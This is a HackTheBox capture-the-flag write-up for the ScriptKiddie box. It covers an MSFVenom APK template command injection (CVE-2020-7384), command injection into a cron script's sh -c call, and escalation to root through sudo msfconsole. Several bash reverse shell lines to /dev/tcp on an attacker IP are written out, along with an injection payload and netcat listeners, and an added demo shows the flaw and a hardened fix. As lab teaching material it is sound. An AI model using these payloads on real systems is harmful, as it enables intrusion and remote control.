HackTheBox — ScriptKiddie

As always, we start with nmap to discover open ports/services.

Nmap scan

nmap -sC -sV -oA scriptkiddie 10.10.10.226

We have two open ports: 22 (SSH) and 5000 (HTTP). Let's enumerate the HTTP port.

HTTP Enumeration

Visiting 10.10.10.226:5000 we see a web application that exposes three tools (Nmap, MSFVenom, Searchsploit) through web forms.

The first thing I tried was injecting OS commands into each field, but nothing worked. Next I did some googling for public exploits for these tools and found the APK template command injection vulnerability in MSFVenom (CVE-2020-7384).

There's a Metasploit module that exploits this vulnerability, but let's use this Python script from Exploit-DB instead.

Exploit: https://www.exploit-db.com/exploits/49491

We need to edit the payload variable in the script first so that it spawns a reverse shell back to our listener (10.10.16.25 is our attacking machine's VPN address, 1337 the listener port):

payload = 'bash -c "/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1"' 

Initial Foothold/User

Now let's start our netcat listener (nc -nvlp 1337), run the exploit, and hand the APK it produces to the web application as the template file in the MSFVenom form. The injection fires when msfvenom processes the template on the server.

And we are on the box as the kid user.

Lateral Movement

After some enumeration I found a script called scanlosers.sh inside the pwn user's home directory. We only have read permission on it, but I think the script is running regularly because the hackers file is cleared every few minutes. So let's understand the script to see how it works.

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

It reads the hackers file inside our home directory, splits each line on spaces, takes everything from the third field onwards (which is meant to be the IP address) and runs an Nmap scan on it. The important detail is that ${ip} is expanded straight into the string handed to sh -c, so whatever we put in that field is re-parsed by a shell rather than treated as a single argument. The script runs as the pwn user, which is what we want to become.

And since we have read/write permission on the hackers file, we can plant a line whose third field contains shell commands and get OS command injection.

Payload: echo "field1 field2 ;bash -c '/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1' #" > hackers

field1 and field2 are only there so that cut drops them and our payload lands in the third field. The ";" terminates the nmap command inside sh -c, and "#" comments out the rest of the line. Note that ${ip} is expanded twice in the script (once in the -oN path, once as the target): the shell breaks out at the first expansion, and the "#" swallows the second copy together with the redirections, so the injected bash -c runs exactly once. The file lives in /home/kid/logs, so run the echo from that directory (or use the full path).

The final step is to have a netcat listener ready before the script's next run: nc -nvlp 1337 . Within a few minutes scanlosers.sh picks up the line and the reverse shell comes back as the pwn user.
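To make the bug concrete without touching the box, here is an added example (not code from the original writeup or from the machine) that rebuilds the scanlosers.sh loop in a temp directory, plants a line with a harmless injected command (touch on a marker file) and then runs a hardened version of the same loop over the same input. The hackers file, the marker file and the fake scanner are constructed for the demo; the nmap call is replaced by a printf so everything runs offline.

```shell
#!/bin/sh
# Added example, not code from the original writeup or from the box: it rebuilds the
# scanlosers.sh flaw in a temp directory and shows a hardened loop. The "hackers" file,
# the marker file and the fake scanner below are constructed for the demo.

workdir="$(mktemp -d)"

# Stand-in for the nmap call so the demo runs offline.
fake_scan() { printf 'scan %s\n' "$1" >> "$workdir/scans.log"; }

# Vulnerable loop, same shape as scanlosers.sh: the third field of each log line is
# expanded straight into the string handed to `sh -c`, so a ';' in it ends the intended
# command and what follows runs as a command of its own. (The '&' is dropped so the
# demo finishes before we check the result.)
vulnerable_loop() {
  log="$1"
  cut -d' ' -f3- "$log" | sort -u | while read -r ip; do
    sh -c "printf 'scan %s\n' ${ip} >> $workdir/scans.log" >/dev/null 2>&1
  done
}

# Hardened loop: only a dotted-quad gets through, and the value is passed to the scanner
# as one argument rather than re-parsed by a shell, so metacharacters are inert.
hardened_loop() {
  log="$1"
  cut -d' ' -f3- "$log" | sort -u | while read -r ip; do
    if ! printf '%s\n' "$ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'; then
      printf 'rejected: %s\n' "$ip" >&2
      continue
    fi
    fake_scan "$ip"
  done
}

# Writes a hackers file with one honest line and one line whose third field carries an
# injected command (touch on a marker file), runs the given loop over it and reports
# whether the injected command executed.
demo() {
  loop="$1"
  log="$workdir/hackers.$loop"
  marker="$workdir/marker.$loop"
  rm -f "$marker"
  printf 'a b 10.10.14.2\n' > "$log"
  printf 'a b ; touch %s #\n' "$marker" >> "$log"
  "$loop" "$log"
  if [ -e "$marker" ]; then echo injected; else echo clean; fi
}

demo vulnerable_loop   # injected: the marker was created by the planted command
demo hardened_loop     # clean: the planted line was rejected, 10.10.14.2 was scanned
```

The fix is two-fold: validate the field against the only shape it should ever have, and stop routing it through a second shell. Either change alone closes this particular payload, but validation without dropping sh -c still leaves the script one quoting mistake away from the same bug.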

Getting root

Running sudo -l shows that we can run Metasploit's msfconsole as root without a password.

msfconsole passes any input it does not recognise as a console command to the system shell, so a shell command typed at the msf prompt runs with the console's privileges. Started via sudo, that means root: typing /bin/bash at the prompt drops us into a root shell.

sudo /opt/metasploit-framework-6-0-9/msfconsole

And we are ROOT!

If you find it useful, kindly give me a respect

Linkedin | Github

I am a penetration testing enthusiast with a computer science background, also interested in CTFs and Python scripting.

0xEmbo